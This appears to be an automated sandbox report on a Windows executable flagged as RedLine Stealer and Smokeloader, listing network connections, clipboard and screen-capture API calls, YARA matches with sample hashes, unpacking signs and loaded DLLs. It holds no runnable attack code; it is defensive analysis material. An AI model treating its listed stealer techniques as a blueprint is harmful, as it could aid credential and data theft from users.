      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
      Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.8:49705 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49706 version: TLS 1.2
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004327B0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004327B0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004327B0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004327B0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004339F0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,0_2_004339F0

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 00000000.00000002.1665368901.00000000009A9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0043E8400_2_0043E840
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0040A8C00_2_0040A8C0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_00437BC00_2_00437BC0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0040AD400_2_0040AD40
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004085D00_2_004085D0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0040C63C0_2_0040C63C
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0043506D0_2_0043506D
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004288890_2_00428889
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004088B00_2_004088B0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004091500_2_00409150
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004059500_2_00405950
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0041A1500_2_0041A150
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004301610_2_00430161
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004141700_2_00414170
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0043A9700_2_0043A970
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0043B1000_2_0043B100
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0041910E0_2_0041910E
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0040D1200_2_0040D120
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004039200_2_00403920
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0041912E0_2_0041912E
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004169300_2_00416930
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0043E9D00_2_0043E9D0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004199E20_2_004199E2
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004371800_2_00437180
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0043D9800_2_0043D980
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004111A60_2_004111A6
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004062400_2_00406240
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0041CA700_2_0041CA70
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0041D2000_2_0041D200
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0041FA100_2_0041FA10
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_00423A1C0_2_00423A1C
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0041E2200_2_0041E220
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_00423A2A0_2_00423A2A
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0042822E0_2_0042822E
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_00426A300_2_00426A30
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_00409AC10_2_00409AC1
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004042D00_2_004042D0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004272D00_2_004272D0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004292D10_2_004292D1
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004162F10_2_004162F1
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_00421A800_2_00421A80
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004242800_2_00424280
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0043F2800_2_0043F280
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0043DA800_2_0043DA80
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_00428A9B0_2_00428A9B
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_00424AA80_2_00424AA8
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_00402B400_2_00402B40
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0041B3600_2_0041B360
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004323700_2_00432370
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0042DB7F0_2_0042DB7F
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0043DBF00_2_0043DBF0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_00419BFF0_2_00419BFF
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_00435B980_2_00435B98
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004223A00_2_004223A0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004383A00_2_004383A0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_00411C400_2_00411C40
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_00404C600_2_00404C60
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0042DB7A0_2_0042DB7A
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0041542D0_2_0041542D
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004144D50_2_004144D5
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0040ECE00_2_0040ECE0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0043DC800_2_0043DC80
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0043EC800_2_0043EC80
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004244860_2_00424486
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004074A00_2_004074A0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0041E5600_2_0041E560
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0043DD000_2_0043DD00
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004325C00_2_004325C0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0043ADE00_2_0043ADE0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0043F5E00_2_0043F5E0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004105F30_2_004105F3
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0040E59D0_2_0040E59D
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_00419BFF0_2_00419BFF
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004365B40_2_004365B4
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0041B6500_2_0041B650
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004096000_2_00409600
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004166030_2_00416603
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0041DE200_2_0041DE20
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004386300_2_00438630
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004186380_2_00418638
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004066D00_2_004066D0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004266D00_2_004266D0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_00415EDC0_2_00415EDC
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_00402EE00_2_00402EE0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004256910_2_00425691
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004236990_2_00423699
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_00405EA00_2_00405EA0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_00438F450_2_00438F45
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0043EF600_2_0043EF60
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0040DF040_2_0040DF04
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_00422F0D0_2_00422F0D
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_00414F1E0_2_00414F1E
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_00436F200_2_00436F20
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004377E00_2_004377E0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004277800_2_00427780
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0041E7900_2_0041E790
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004277A00_2_004277A0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_00423FA00_2_00423FA0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_004227B00_2_004227B0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024A7A470_2_024A7A47
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_02492A170_2_02492A17
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024A52D40_2_024A52D4
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024AEAA70_2_024AEAA7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_02478B170_2_02478B17
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0247AB270_2_0247AB27
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024A03C80_2_024A03C8
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024AABD70_2_024AABD7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024A73E70_2_024A73E7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0247D3870_2_0247D387
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_02473B870_2_02473B87
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024893950_2_02489395
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024793B70_2_024793B7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_02475BB70_2_02475BB7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0248A3B70_2_0248A3B7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024AB0470_2_024AB047
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024AF8470_2_024AF847
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0248085A0_2_0248085A
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024798670_2_02479867
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024A681B0_2_024A681B
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024A28270_2_024A2827
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024788370_2_02478837
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0248D08A0_2_0248D08A
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0248E0870_2_0248E087
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024A88970_2_024A8897
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0247C8A30_2_0247C8A3
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024888A10_2_024888A1
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0248B8B70_2_0248B8B7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0247E16B0_2_0247E16B
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024761070_2_02476107
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024769370_2_02476937
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024969370_2_02496937
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024AF1C70_2_024AF1C7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0248E9F70_2_0248E9F7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024851850_2_02485185
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024A71870_2_024A7187
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_02489E660_2_02489E66
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024926070_2_02492607
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024A7E270_2_024A7E27
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_02474EC70_2_02474EC7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0249DDE10_2_0249DDE1
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024AEEE70_2_024AEEE7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_02481EA70_2_02481EA7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0247EF470_2_0247EF47
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024777070_2_02477707
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0248E7C70_2_0248E7C7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0248D4670_2_0248D467
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0248FC770_2_0248FC77
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0248140D0_2_0248140D
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024AEC370_2_024AEC37
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024AF4E70_2_024AF4E7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_02491CE70_2_02491CE7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0248E4870_2_0248E487
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024764A70_2_024764A7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024865580_2_02486558
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_02494D070_2_02494D07
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_02479D280_2_02479D28
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024745370_2_02474537
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024975370_2_02497537
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0248B5C70_2_0248B5C7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024A25D70_2_024A25D7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0249DDE60_2_0249DDE6
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024A5DFF0_2_024A5DFF
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0248CD8D0_2_0248CD8D
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_02472DA70_2_02472DA7
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: String function: 024843C7 appears 69 times
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: String function: 00414160 appears 69 times
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: String function: 00407EB0 appears 57 times
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: String function: 02478117 appears 74 times
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 1784
      Source: 3zg6i6Zu1u.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000000.00000002.1665368901.00000000009A9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 3zg6i6Zu1u.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@11/2
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_009A9C5E CreateToolhelp32Snapshot,Module32First,0_2_009A9C5E
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_00437BC0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,0_2_00437BC0
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1564
      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\671973ee-7ef1-4ae3-be34-2c6d2669120bJump to behavior
      Source: 3zg6i6Zu1u.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: 3zg6i6Zu1u.exeVirustotal: Detection: 73%
      Source: 3zg6i6Zu1u.exeReversingLabs: Detection: 78%
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeFile read: C:\Users\user\Desktop\3zg6i6Zu1u.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\3zg6i6Zu1u.exe "C:\Users\user\Desktop\3zg6i6Zu1u.exe"
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 1784
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: msvcr100.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Data Obfuscation

      barindex
      Detected unpacking (changes PE section rights)
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeUnpacked PE file: 0.2.3zg6i6Zu1u.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
      Detected unpacking (overwrites its own PE header)
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeUnpacked PE file: 0.2.3zg6i6Zu1u.exe.400000.0.unpack
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0043D950 push eax; mov dword ptr [esp], 71708F5Eh0_2_0043D951
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0044728C push ds; ret 0_2_0044728D
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0043AD30 push eax; mov dword ptr [esp], ADAEAFA0h0_2_0043AD3E
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_00446EDF push eax; retf 0_2_00446EE0
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_0247EA8C push edx; ret 0_2_0247EA8D
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024ADBB7 push eax; mov dword ptr [esp], 71708F5Eh0_2_024ADBB8
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeCode function: 0_2_024AAF97 push eax; mov dword ptr [esp], ADAEAFA0h0_2_024AAFA5
      Source: 3zg6i6Zu1u.exeStatic PE information: section name: .text entropy: 7.366149067404338
      Source: C:\Users\user\Desktop\3zg6i6Zu1u.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
